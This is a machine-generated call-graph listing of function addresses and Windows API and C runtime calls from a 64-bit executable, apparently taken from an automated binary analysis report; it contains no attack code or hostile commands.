17454->17455 17455->17425 17457 7ff6c8204c32 17456->17457 17458 7ff6c8204c57 17457->17458 17459 7ff6c8204c93 17457->17459 17460 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17458->17460 17474 7ff6c8202f90 17459->17474 17462 7ff6c8204c81 17460->17462 17464 7ff6c81fc550 _log10_special 8 API calls 17462->17464 17463 7ff6c8204d74 17465 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17463->17465 17467 7ff6c81f2d04 17464->17467 17465->17462 17467->17428 17468 7ff6c8204d9a 17468->17463 17470 7ff6c8204da4 17468->17470 17469 7ff6c8204d49 17471 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17469->17471 17473 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17470->17473 17471->17462 17472 7ff6c8204d40 17472->17463 17472->17469 17473->17462 17475 7ff6c8202fce 17474->17475 17476 7ff6c8202fbe 17474->17476 17477 7ff6c8202fd7 17475->17477 17481 7ff6c8203005 17475->17481 17478 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17476->17478 17479 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17477->17479 17480 7ff6c8202ffd 17478->17480 17479->17480 17480->17463 17480->17468 17480->17469 17480->17472 17481->17476 17481->17480 17485 7ff6c82039a4 17481->17485 17518 7ff6c82033f0 17481->17518 17555 7ff6c8202b80 17481->17555 17486 7ff6c8203a57 17485->17486 17487 7ff6c82039e6 17485->17487 17488 7ff6c8203ab0 17486->17488 17489 7ff6c8203a5c 17486->17489 17490 7ff6c8203a81 17487->17490 17491 7ff6c82039ec 17487->17491 17497 7ff6c8203aba 17488->17497 17498 7ff6c8203ac7 17488->17498 17503 7ff6c8203abf 17488->17503 17492 7ff6c8203a91 17489->17492 17493 7ff6c8203a5e 17489->17493 17578 7ff6c8201d54 17490->17578 17494 7ff6c82039f1 17491->17494 17495 7ff6c8203a20 17491->17495 17585 7ff6c8201944 17492->17585 17496 7ff6c8203a00 17493->17496 17507 7ff6c8203a6d 17493->17507 17494->17498 17500 7ff6c82039f7 17494->17500 17495->17500 17495->17503 17516 7ff6c8203af0 17496->17516 17558 7ff6c8204158 17496->17558 17497->17490 17497->17503 17592 7ff6c82046ac 17498->17592 17500->17496 17505 7ff6c8203a1b 17500->17505 17506 7ff6c8203a32 17500->17506 17503->17516 17596 7ff6c8202164 17503->17596 17505->17516 17517 7ff6c8203cdc 17505->17517 17603 7ff6c82047c0 17505->17603 17506->17516 17568 7ff6c8204494 17506->17568 17507->17490 17509 7ff6c8203a72 17507->17509 17509->17516 17574 7ff6c8204558 17509->17574 17511 7ff6c81fc550 _log10_special 8 API calls 17513 7ff6c8203dea 17511->17513 17513->17481 17516->17511 17517->17516 17609 7ff6c820ea08 17517->17609 17519 7ff6c8203414 17518->17519 17520 7ff6c82033fe 17518->17520 17521 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17519->17521 17543 7ff6c8203454 17519->17543 17522 7ff6c8203a57 17520->17522 17523 7ff6c82039e6 17520->17523 17520->17543 17521->17543 17524 7ff6c8203a5c 17522->17524 17529 7ff6c8203ab0 17522->17529 17525 7ff6c8203a81 17523->17525 17526 7ff6c82039ec 17523->17526 17527 7ff6c8203a91 17524->17527 17528 7ff6c8203a5e 17524->17528 17535 7ff6c8201d54 38 API calls 17525->17535 17530 7ff6c82039f1 17526->17530 17531 7ff6c8203a20 17526->17531 17537 7ff6c8201944 38 API calls 17527->17537 17532 7ff6c8203a00 17528->17532 17541 7ff6c8203a6d 17528->17541 17533 7ff6c8203aba 17529->17533 17534 7ff6c8203ac7 17529->17534 17539 7ff6c8203abf 17529->17539 17530->17534 17536 7ff6c82039f7 17530->17536 17531->17536 17531->17539 17538 7ff6c8204158 47 API calls 17532->17538 17553 7ff6c8203af0 17532->17553 17533->17525 17533->17539 17540 7ff6c82046ac 45 API calls 17534->17540 17550 7ff6c8203a1b 17535->17550 17536->17532 17542 7ff6c8203a32 17536->17542 17536->17550 17537->17550 17538->17550 17544 7ff6c8202164 38 API calls 17539->17544 17539->17553 17540->17550 17541->17525 17545 7ff6c8203a72 17541->17545 17546 7ff6c8204494 46 API calls 17542->17546 17542->17553 17543->17481 17544->17550 17548 7ff6c8204558 37 API calls 17545->17548 17545->17553 17546->17550 17547 7ff6c81fc550 _log10_special 8 API calls 17549 7ff6c8203dea 17547->17549 17548->17550 17549->17481 17551 7ff6c82047c0 45 API calls 17550->17551 17550->17553 17554 7ff6c8203cdc 17550->17554 17551->17554 17552 7ff6c820ea08 46 API calls 17552->17554 17553->17547 17554->17552 17554->17553 17775 7ff6c8200fc8 17555->17775 17559 7ff6c820417e 17558->17559 17621 7ff6c8200b80 17559->17621 17564 7ff6c82042c3 17566 7ff6c82047c0 45 API calls 17564->17566 17567 7ff6c8204351 17564->17567 17565 7ff6c82047c0 45 API calls 17565->17564 17566->17567 17567->17505 17569 7ff6c82044c9 17568->17569 17570 7ff6c82044e7 17569->17570 17571 7ff6c820450e 17569->17571 17572 7ff6c82047c0 45 API calls 17569->17572 17573 7ff6c820ea08 46 API calls 17570->17573 17571->17505 17572->17570 17573->17571 17575 7ff6c8204579 17574->17575 17576 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17575->17576 17577 7ff6c82045aa 17575->17577 17576->17577 17577->17505 17579 7ff6c8201d87 17578->17579 17580 7ff6c8201db6 17579->17580 17582 7ff6c8201e73 17579->17582 17584 7ff6c8201df3 17580->17584 17748 7ff6c8200c28 17580->17748 17583 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17582->17583 17583->17584 17584->17505 17586 7ff6c8201977 17585->17586 17587 7ff6c82019a6 17586->17587 17589 7ff6c8201a63 17586->17589 17588 7ff6c8200c28 12 API calls 17587->17588 17591 7ff6c82019e3 17587->17591 17588->17591 17590 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17589->17590 17590->17591 17591->17505 17593 7ff6c82046ef 17592->17593 17595 7ff6c82046f3 __crtLCMapStringW 17593->17595 17756 7ff6c8204748 17593->17756 17595->17505 17597 7ff6c8202197 17596->17597 17598 7ff6c82021c6 17597->17598 17600 7ff6c8202283 17597->17600 17599 7ff6c8200c28 12 API calls 17598->17599 17602 7ff6c8202203 17598->17602 17599->17602 17601 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17600->17601 17601->17602 17602->17505 17604 7ff6c82047d7 17603->17604 17760 7ff6c820d9b8 17604->17760 17611 7ff6c820ea39 17609->17611 17618 7ff6c820ea47 17609->17618 17610 7ff6c820ea67 17613 7ff6c820ea78 17610->17613 17614 7ff6c820ea9f 17610->17614 17611->17610 17612 7ff6c82047c0 45 API calls 17611->17612 17611->17618 17612->17610 17768 7ff6c82100a0 17613->17768 17616 7ff6c820eac9 17614->17616 17617 7ff6c820eb2a 17614->17617 17614->17618 17616->17618 17620 7ff6c820f8a0 _fread_nolock MultiByteToWideChar 17616->17620 17619 7ff6c820f8a0 _fread_nolock MultiByteToWideChar 17617->17619 17618->17517 17619->17618 17620->17618 17622 7ff6c8200bb7 17621->17622 17628 7ff6c8200ba6 17621->17628 17623 7ff6c820d5fc _fread_nolock 12 API calls 17622->17623 17622->17628 17624 7ff6c8200be4 17623->17624 17625 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17624->17625 17627 7ff6c8200bf8 17624->17627 17625->17627 17626 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17626->17628 17627->17626 17629 7ff6c820e570 17628->17629 17630 7ff6c820e58d 17629->17630 17631 7ff6c820e5c0 17629->17631 17632 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17630->17632 17631->17630 17633 7ff6c820e5f2 17631->17633 17641 7ff6c82042a1 17632->17641 17638 7ff6c820e705 17633->17638 17646 7ff6c820e63a 17633->17646 17634 7ff6c820e7f7 17675 7ff6c820da5c 17634->17675 17636 7ff6c820e7bd 17668 7ff6c820ddf4 17636->17668 17638->17634 17638->17636 17639 7ff6c820e78c 17638->17639 17640 7ff6c820e74f 17638->17640 17643 7ff6c820e745 17638->17643 17661 7ff6c820e0d4 17639->17661 17651 7ff6c820e304 17640->17651 17641->17564 17641->17565 17643->17636 17645 7ff6c820e74a 17643->17645 17645->17639 17645->17640 17646->17641 17647 7ff6c820a4a4 __std_exception_copy 37 API calls 17646->17647 17648 7ff6c820e6f2 17647->17648 17648->17641 17649 7ff6c820a900 _isindst 17 API calls 17648->17649 17650 7ff6c820e854 17649->17650 17684 7ff6c82140ac 17651->17684 17655 7ff6c820e3ac 17656 7ff6c820e401 17655->17656 17658 7ff6c820e3cc 17655->17658 17660 7ff6c820e3b0 17655->17660 17737 7ff6c820def0 17656->17737 17733 7ff6c820e1ac 17658->17733 17660->17641 17662 7ff6c82140ac 38 API calls 17661->17662 17663 7ff6c820e11e 17662->17663 17664 7ff6c8213af4 37 API calls 17663->17664 17665 7ff6c820e16e 17664->17665 17666 7ff6c820e172 17665->17666 17667 7ff6c820e1ac 45 API calls 17665->17667 17666->17641 17667->17666 17669 7ff6c82140ac 38 API calls 17668->17669 17670 7ff6c820de3f 17669->17670 17671 7ff6c8213af4 37 API calls 17670->17671 17673 7ff6c820de97 17671->17673 17672 7ff6c820de9b 17672->17641 17673->17672 17674 7ff6c820def0 45 API calls 17673->17674 17674->17672 17676 7ff6c820daa1 17675->17676 17677 7ff6c820dad4 17675->17677 17678 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17676->17678 17679 7ff6c820daec 17677->17679 17681 7ff6c820db6d 17677->17681 17683 7ff6c820dacd memcpy_s 17678->17683 17680 7ff6c820ddf4 46 API calls 17679->17680 17680->17683 17682 7ff6c82047c0 45 API calls 17681->17682 17681->17683 17682->17683 17683->17641 17685 7ff6c82140ff fegetenv 17684->17685 17686 7ff6c8217e2c 37 API calls 17685->17686 17690 7ff6c8214152 17686->17690 17687 7ff6c821417f 17692 7ff6c820a4a4 __std_exception_copy 37 API calls 17687->17692 17688 7ff6c8214242 17689 7ff6c8217e2c 37 API calls 17688->17689 17691 7ff6c821426c 17689->17691 17690->17688 17693 7ff6c821416d 17690->17693 17694 7ff6c821421c 17690->17694 17695 7ff6c8217e2c 37 API calls 17691->17695 17696 7ff6c82141fd 17692->17696 17693->17687 17693->17688 17697 7ff6c820a4a4 __std_exception_copy 37 API calls 17694->17697 17698 7ff6c821427d 17695->17698 17699 7ff6c8215324 17696->17699 17703 7ff6c8214205 17696->17703 17697->17696 17701 7ff6c8218020 20 API calls 17698->17701 17700 7ff6c820a900 _isindst 17 API calls 17699->17700 17702 7ff6c8215339 17700->17702 17711 7ff6c82142e6 memcpy_s 17701->17711 17704 7ff6c81fc550 _log10_special 8 API calls 17703->17704 17705 7ff6c820e351 17704->17705 17729 7ff6c8213af4 17705->17729 17706 7ff6c821468f memcpy_s 17707 7ff6c82149cf 17709 7ff6c8213c10 37 API calls 17707->17709 17708 7ff6c8214327 memcpy_s 17721 7ff6c8214c6b memcpy_s 17708->17721 17726 7ff6c8214783 memcpy_s 17708->17726 17712 7ff6c82150e7 17709->17712 17710 7ff6c821497b 17710->17707 17710->17710 17713 7ff6c821533c memcpy_s 37 API calls 17710->17713 17711->17706 17711->17708 17714 7ff6c8204f08 _get_daylight 11 API calls 17711->17714 17712->17712 17718 7ff6c821533c memcpy_s 37 API calls 17712->17718 17728 7ff6c8215142 17712->17728 17713->17707 17716 7ff6c8214760 17714->17716 17715 7ff6c82152c8 17719 7ff6c8217e2c 37 API calls 17715->17719 17717 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 17716->17717 17717->17708 17718->17728 17719->17703 17720 7ff6c8204f08 11 API calls _get_daylight 17720->17721 17721->17707 17721->17710 17721->17720 17725 7ff6c820a8e0 37 API calls _invalid_parameter_noinfo 17721->17725 17722 7ff6c8204f08 11 API calls _get_daylight 17722->17726 17723 7ff6c820a8e0 37 API calls _invalid_parameter_noinfo 17723->17726 17724 7ff6c8213c10 37 API calls 17724->17728 17725->17721 17726->17710 17726->17722 17726->17723 17727 7ff6c821533c memcpy_s 37 API calls 17727->17728 17728->17715 17728->17724 17728->17727 17730 7ff6c8213b13 17729->17730 17731 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17730->17731 17732 7ff6c8213b3e memcpy_s 17730->17732 17731->17732 17732->17655 17734 7ff6c820e1d8 memcpy_s 17733->17734 17735 7ff6c82047c0 45 API calls 17734->17735 17736 7ff6c820e292 memcpy_s 17734->17736 17735->17736 17736->17660 17738 7ff6c820df2b 17737->17738 17741 7ff6c820df78 memcpy_s 17737->17741 17739 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17738->17739 17740 7ff6c820df57 17739->17740 17740->17660 17742 7ff6c820dfe3 17741->17742 17744 7ff6c82047c0 45 API calls 17741->17744 17743 7ff6c820a4a4 __std_exception_copy 37 API calls 17742->17743 17745 7ff6c820e025 memcpy_s 17743->17745 17744->17742 17746 7ff6c820a900 _isindst 17 API calls 17745->17746 17747 7ff6c820e0d0 17746->17747 17749 7ff6c8200c4e 17748->17749 17750 7ff6c8200c5f 17748->17750 17749->17584 17750->17749 17751 7ff6c820d5fc _fread_nolock 12 API calls 17750->17751 17752 7ff6c8200c90 17751->17752 17753 7ff6c8200ca4 17752->17753 17755 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17752->17755 17754 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17753->17754 17754->17749 17755->17753 17757 7ff6c820476e 17756->17757 17758 7ff6c8204766 17756->17758 17757->17595 17759 7ff6c82047c0 45 API calls 17758->17759 17759->17757 17761 7ff6c820d9d1 17760->17761 17763 7ff6c82047ff 17760->17763 17762 7ff6c8213304 45 API calls 17761->17762 17761->17763 17762->17763 17764 7ff6c820da24 17763->17764 17765 7ff6c820da3d 17764->17765 17766 7ff6c820480f 17764->17766 17765->17766 17767 7ff6c8212650 45 API calls 17765->17767 17766->17517 17767->17766 17771 7ff6c8216d88 17768->17771 17774 7ff6c8216dec 17771->17774 17772 7ff6c81fc550 _log10_special 8 API calls 17773 7ff6c82100bd 17772->17773 17773->17618 17774->17772 17776 7ff6c820100f 17775->17776 17777 7ff6c8200ffd 17775->17777 17780 7ff6c820101d 17776->17780 17784 7ff6c8201059 17776->17784 17778 7ff6c8204f08 _get_daylight 11 API calls 17777->17778 17779 7ff6c8201002 17778->17779 17781 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 17779->17781 17782 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17780->17782 17789 7ff6c820100d 17781->17789 17782->17789 17783 7ff6c82013d5 17785 7ff6c8204f08 _get_daylight 11 API calls 17783->17785 17783->17789 17784->17783 17786 7ff6c8204f08 _get_daylight 11 API calls 17784->17786 17787 7ff6c8201669 17785->17787 17788 7ff6c82013ca 17786->17788 17790 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 17787->17790 17791 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 17788->17791 17789->17481 17790->17789 17791->17783 17793 7ff6c8200704 17792->17793 17820 7ff6c8200464 17793->17820 17795 7ff6c820071d 17795->17135 17832 7ff6c82003bc 17796->17832 17800 7ff6c81fc850 17799->17800 17801 7ff6c81f2930 GetCurrentProcessId 17800->17801 17802 7ff6c81f1c80 49 API calls 17801->17802 17803 7ff6c81f2979 17802->17803 17846 7ff6c8204984 17803->17846 17808 7ff6c81f1c80 49 API calls 17809 7ff6c81f29ff 17808->17809 17876 7ff6c81f2620 17809->17876 17812 7ff6c81fc550 _log10_special 8 API calls 17813 7ff6c81f2a31 17812->17813 17813->17174 17815 7ff6c81f1b89 17814->17815 17816 7ff6c8200119 17814->17816 17815->17173 17815->17174 17817 7ff6c8204f08 _get_daylight 11 API calls 17816->17817 17818 7ff6c820011e 17817->17818 17819 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 17818->17819 17819->17815 17821 7ff6c82004ce 17820->17821 17822 7ff6c820048e 17820->17822 17821->17822 17824 7ff6c82004da 17821->17824 17823 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17822->17823 17830 7ff6c82004b5 17823->17830 17831 7ff6c820546c EnterCriticalSection 17824->17831 17830->17795 17833 7ff6c82003e6 17832->17833 17844 7ff6c81f1a20 17832->17844 17834 7ff6c8200432 17833->17834 17838 7ff6c82003f5 memcpy_s 17833->17838 17833->17844 17845 7ff6c820546c EnterCriticalSection 17834->17845 17836 7ff6c8204f08 _get_daylight 11 API calls 17839 7ff6c820040a 17836->17839 17838->17836 17841 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 17839->17841 17841->17844 17844->17143 17844->17144 17850 7ff6c82049de 17846->17850 17847 7ff6c8204a03 17848 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17847->17848 17852 7ff6c8204a2d 17848->17852 17849 7ff6c8204a3f 17885 7ff6c8202c10 17849->17885 17850->17847 17850->17849 17853 7ff6c81fc550 _log10_special 8 API calls 17852->17853 17855 7ff6c81f29c3 17853->17855 17854 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17854->17852 17864 7ff6c8205160 17855->17864 17857 7ff6c8204b1c 17857->17854 17858 7ff6c8204ae8 17858->17857 17863 7ff6c8204af1 17858->17863 17859 7ff6c8204b40 17859->17857 17861 7ff6c8204b4a 17859->17861 17860 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17860->17852 17862 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17861->17862 17862->17852 17863->17860 17865 7ff6c820b2c8 _get_daylight 11 API calls 17864->17865 17866 7ff6c8205177 17865->17866 17867 7ff6c820eb98 _get_daylight 11 API calls 17866->17867 17868 7ff6c82051b7 17866->17868 17873 7ff6c81f29e5 17866->17873 17869 7ff6c82051ac 17867->17869 17868->17873 18020 7ff6c820ec20 17868->18020 17870 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17869->17870 17870->17868 17873->17808 17874 7ff6c820a900 _isindst 17 API calls 17875 7ff6c82051fc 17874->17875 17877 7ff6c81f262f 17876->17877 17878 7ff6c81f9390 2 API calls 17877->17878 17879 7ff6c81f2660 17878->17879 17880 7ff6c81f2683 MessageBoxA 17879->17880 17881 7ff6c81f266f MessageBoxW 17879->17881 17882 7ff6c81f2690 17880->17882 17881->17882 17883 7ff6c81fc550 _log10_special 8 API calls 17882->17883 17884 7ff6c81f26a0 17883->17884 17884->17812 17886 7ff6c8202c4e 17885->17886 17887 7ff6c8202c3e 17885->17887 17888 7ff6c8202c57 17886->17888 17893 7ff6c8202c85 17886->17893 17889 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17887->17889 17890 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17888->17890 17891 7ff6c8202c7d 17889->17891 17890->17891 17891->17857 17891->17858 17891->17859 17891->17863 17892 7ff6c82047c0 45 API calls 17892->17893 17893->17887 17893->17891 17893->17892 17895 7ff6c8202f34 17893->17895 17899 7ff6c82035a0 17893->17899 17925 7ff6c8203268 17893->17925 17955 7ff6c8202af0 17893->17955 17897 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17895->17897 17897->17887 17900 7ff6c8203655 17899->17900 17901 7ff6c82035e2 17899->17901 17904 7ff6c82036af 17900->17904 17905 7ff6c820365a 17900->17905 17902 7ff6c820367f 17901->17902 17903 7ff6c82035e8 17901->17903 17972 7ff6c8201b50 17902->17972 17910 7ff6c82035ed 17903->17910 17913 7ff6c82036be 17903->17913 17904->17902 17904->17913 17923 7ff6c8203618 17904->17923 17906 7ff6c820368f 17905->17906 17907 7ff6c820365c 17905->17907 17979 7ff6c8201740 17906->17979 17909 7ff6c82035fd 17907->17909 17916 7ff6c820366b 17907->17916 17924 7ff6c82036ed 17909->17924 17958 7ff6c8203f04 17909->17958 17910->17909 17914 7ff6c8203630 17910->17914 17910->17923 17913->17924 17986 7ff6c8201f60 17913->17986 17914->17924 17968 7ff6c82043c0 17914->17968 17916->17902 17918 7ff6c8203670 17916->17918 17920 7ff6c8204558 37 API calls 17918->17920 17918->17924 17919 7ff6c81fc550 _log10_special 8 API calls 17921 7ff6c8203983 17919->17921 17920->17923 17921->17893 17923->17924 17993 7ff6c820e858 17923->17993 17924->17919 17926 7ff6c8203273 17925->17926 17927 7ff6c8203289 17925->17927 17929 7ff6c8203655 17926->17929 17930 7ff6c82035e2 17926->17930 17931 7ff6c82032c7 17926->17931 17928 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17927->17928 17927->17931 17928->17931 17934 7ff6c82036af 17929->17934 17935 7ff6c820365a 17929->17935 17932 7ff6c820367f 17930->17932 17933 7ff6c82035e8 17930->17933 17931->17893 17938 7ff6c8201b50 38 API calls 17932->17938 17940 7ff6c82035ed 17933->17940 17943 7ff6c82036be 17933->17943 17934->17932 17934->17943 17953 7ff6c8203618 17934->17953 17936 7ff6c820368f 17935->17936 17937 7ff6c820365c 17935->17937 17941 7ff6c8201740 38 API calls 17936->17941 17939 7ff6c82035fd 17937->17939 17946 7ff6c820366b 17937->17946 17938->17953 17942 7ff6c8203f04 47 API calls 17939->17942 17954 7ff6c82036ed 17939->17954 17940->17939 17944 7ff6c8203630 17940->17944 17940->17953 17941->17953 17942->17953 17945 7ff6c8201f60 38 API calls 17943->17945 17943->17954 17947 7ff6c82043c0 47 API calls 17944->17947 17944->17954 17945->17953 17946->17932 17948 7ff6c8203670 17946->17948 17947->17953 17950 7ff6c8204558 37 API calls 17948->17950 17948->17954 17949 7ff6c81fc550 _log10_special 8 API calls 17951 7ff6c8203983 17949->17951 17950->17953 17951->17893 17952 7ff6c820e858 47 API calls 17952->17953 17953->17952 17953->17954 17954->17949 18003 7ff6c8200d14 17955->18003 17959 7ff6c8203f26 17958->17959 17960 7ff6c8200b80 12 API calls 17959->17960 17961 7ff6c8203f6e 17960->17961 17962 7ff6c820e570 46 API calls 17961->17962 17963 7ff6c8204041 17962->17963 17964 7ff6c8204063 17963->17964 17965 7ff6c82047c0 45 API calls 17963->17965 17966 7ff6c82047c0 45 API calls 17964->17966 17967 7ff6c82040ec 17964->17967 17965->17964 17966->17967 17967->17923 17969 7ff6c82043d8 17968->17969 17971 7ff6c8204440 17968->17971 17970 7ff6c820e858 47 API calls 17969->17970 17969->17971 17970->17971 17971->17923 17973 7ff6c8201b83 17972->17973 17974 7ff6c8201bb2 17973->17974 17976 7ff6c8201c6f 17973->17976 17975 7ff6c8200b80 12 API calls 17974->17975 17978 7ff6c8201bef 17974->17978 17975->17978 17977 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17976->17977 17977->17978 17978->17923 17980 7ff6c8201773 17979->17980 17981 7ff6c82017a2 17980->17981 17983 7ff6c820185f 17980->17983 17982 7ff6c8200b80 12 API calls 17981->17982 17985 7ff6c82017df 17981->17985 17982->17985 17984 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17983->17984 17984->17985 17985->17923 17987 7ff6c8201f93 17986->17987 17988 7ff6c8201fc2 17987->17988 17990 7ff6c820207f 17987->17990 17989 7ff6c8200b80 12 API calls 17988->17989 17992 7ff6c8201fff 17988->17992 17989->17992 17991 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17990->17991 17991->17992 17992->17923 17994 7ff6c820e880 17993->17994 17995 7ff6c820e8c5 17994->17995 17996 7ff6c82047c0 45 API calls 17994->17996 17998 7ff6c820e8ae memcpy_s 17994->17998 18002 7ff6c820e885 memcpy_s 17994->18002 17995->17998 17999 7ff6c82107e8 WideCharToMultiByte 17995->17999 17995->18002 17996->17995 17997 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17997->18002 17998->17997 17998->18002 18000 7ff6c820e9a1 17999->18000 18001 7ff6c820e9b6 GetLastError 18000->18001 18000->18002 18001->17998 18001->18002 18002->17923 18004 7ff6c8200d53 18003->18004 18005 7ff6c8200d41 18003->18005 18008 7ff6c8200d60 18004->18008 18011 7ff6c8200d9d 18004->18011 18006 7ff6c8204f08 _get_daylight 11 API calls 18005->18006 18007 7ff6c8200d46 18006->18007 18009 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 18007->18009 18010 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 18008->18010 18017 7ff6c8200d51 18009->18017 18010->18017 18012 7ff6c8200e46 18011->18012 18014 7ff6c8204f08 _get_daylight 11 API calls 18011->18014 18013 7ff6c8204f08 _get_daylight 11 API calls 18012->18013 18012->18017 18016 7ff6c8200ef0 18013->18016 18015 7ff6c8200e3b 18014->18015 18018 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 18015->18018 18019 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 18016->18019 18017->17893 18018->18012 18019->18017 18024 7ff6c820ec3d 18020->18024 18021 7ff6c820ec42 18022 7ff6c82051dd 18021->18022 18023 7ff6c8204f08 _get_daylight 11 API calls 18021->18023 18022->17873 18022->17874 18025 7ff6c820ec4c 18023->18025 18024->18021 18024->18022 18027 7ff6c820ec8c 18024->18027 18026 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 18025->18026 18026->18022 18027->18022 18028 7ff6c8204f08 _get_daylight 11 API calls 18027->18028 18028->18025 18030 7ff6c8208258 18029->18030 18031 7ff6c8208245 18029->18031 18039 7ff6c8207ebc 18030->18039 18032 7ff6c8204f08 _get_daylight 11 API calls 18031->18032 18035 7ff6c820824a 18032->18035 18037 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 18035->18037 18036 7ff6c8208256 18036->17194 18037->18036 18046 7ff6c82102d8 EnterCriticalSection 18039->18046 18048 7ff6c81f8633 __std_exception_copy 18047->18048 18049 7ff6c81f85b1 GetTokenInformation 18047->18049 18052 7ff6c81f864c 18048->18052 18053 7ff6c81f8646 CloseHandle 18048->18053 18050 7ff6c81f85d2 GetLastError 18049->18050 18051 7ff6c81f85dd 18049->18051 18050->18048 18050->18051 18051->18048 18054 7ff6c81f85f9 GetTokenInformation 18051->18054 18052->17199 18053->18052 18054->18048 18055 7ff6c81f861c 18054->18055 18055->18048 18056 7ff6c81f8626 ConvertSidToStringSidW 18055->18056 18056->18048 18058 7ff6c81fc850 18057->18058 18059 7ff6c81f2b74 GetCurrentProcessId 18058->18059 18060 7ff6c81f26b0 48 API calls 18059->18060 18061 7ff6c81f2bc7 18060->18061 18062 7ff6c8204bd8 48 API calls 18061->18062 18063 7ff6c81f2c10 MessageBoxW 18062->18063 18064 7ff6c81fc550 _log10_special 8 API calls 18063->18064 18065 7ff6c81f2c40 18064->18065 18065->17209 18067 7ff6c81f25e5 18066->18067 18068 7ff6c8204bd8 48 API calls 18067->18068 18069 7ff6c81f2604 18068->18069 18069->17218 18105 7ff6c8208794 18070->18105 18074 7ff6c81f81dc 18073->18074 18075 7ff6c81f9390 2 API calls 18074->18075 18076 7ff6c81f81fb 18075->18076 18077 7ff6c81f8203 18076->18077 18078 7ff6c81f8216 ExpandEnvironmentStringsW 18076->18078 18079 7ff6c81f2810 49 API calls 18077->18079 18080 7ff6c81f823c __std_exception_copy 18078->18080 18081 7ff6c81f820f __std_exception_copy 18079->18081 18082 7ff6c81f8240 18080->18082 18084 7ff6c81f8253 18080->18084 18085 7ff6c81fc550 _log10_special 8 API calls 18081->18085 18083 7ff6c81f2810 49 API calls 18082->18083 18083->18081 18087 7ff6c81f8261 GetDriveTypeW 18084->18087 18088 7ff6c81f82bf 18084->18088 18086 7ff6c81f83af 18085->18086 18086->17224 18086->17226 18092 7ff6c81f8295 18087->18092 18093 7ff6c81f82b0 18087->18093 18238 7ff6c8207e08 18088->18238 18095 7ff6c81f2810 49 API calls 18092->18095 18231 7ff6c820796c 18093->18231 18095->18081 18146 7ff6c8211558 18105->18146 18205 7ff6c82112d0 18146->18205 18226 7ff6c82102d8 EnterCriticalSection 18205->18226 18232 7ff6c820798a 18231->18232 18235 7ff6c82079bd 18231->18235 18232->18235 18250 7ff6c8210474 18232->18250 18235->18081 18239 7ff6c8207e24 18238->18239 18240 7ff6c8207e92 18238->18240 18239->18240 18242 7ff6c8207e29 18239->18242 18284 7ff6c82107c0 18240->18284 18243 7ff6c8207e41 18242->18243 18244 7ff6c8207e5e 18242->18244 18259 7ff6c8207bd8 GetFullPathNameW 18243->18259 18267 7ff6c8207c4c GetFullPathNameW 18244->18267 18251 7ff6c821048b 18250->18251 18252 7ff6c8210481 18250->18252 18253 7ff6c8204f08 _get_daylight 11 API calls 18251->18253 18252->18251 18257 7ff6c82104a7 18252->18257 18260 7ff6c8207c14 18259->18260 18287 7ff6c82105d0 18284->18287 18288 7ff6c82105fb 18287->18288 18289 7ff6c8210612 18287->18289 18340 7ff6c81f456a 18339->18340 18341 7ff6c81f9390 2 API calls 18340->18341 18342 7ff6c81f458f 18341->18342 18343 7ff6c81fc550 _log10_special 8 API calls 18342->18343 18344 7ff6c81f45b7 18343->18344 18344->17255 18346 7ff6c81f7e2e 18345->18346 18347 7ff6c81f7f52 18346->18347 18348 7ff6c81f1c80 49 API calls 18346->18348 18349 7ff6c81fc550 _log10_special 8 API calls 18347->18349 18353 7ff6c81f7eb5 18348->18353 18350 7ff6c81f7f83 18349->18350 18350->17255 18351 7ff6c81f1c80 49 API calls 18351->18353 18352 7ff6c81f4560 10 API calls 18352->18353 18353->18347 18353->18351 18353->18352 18354 7ff6c81f9390 2 API calls 18353->18354 18355 7ff6c81f7f23 CreateDirectoryW 18354->18355 18355->18347 18355->18353 18357 7ff6c81f1613 18356->18357 18358 7ff6c81f1637 18356->18358 18477 7ff6c81f1050 18357->18477 18360 7ff6c81f45c0 108 API calls 18358->18360 18362 7ff6c81f164b 18360->18362 18361 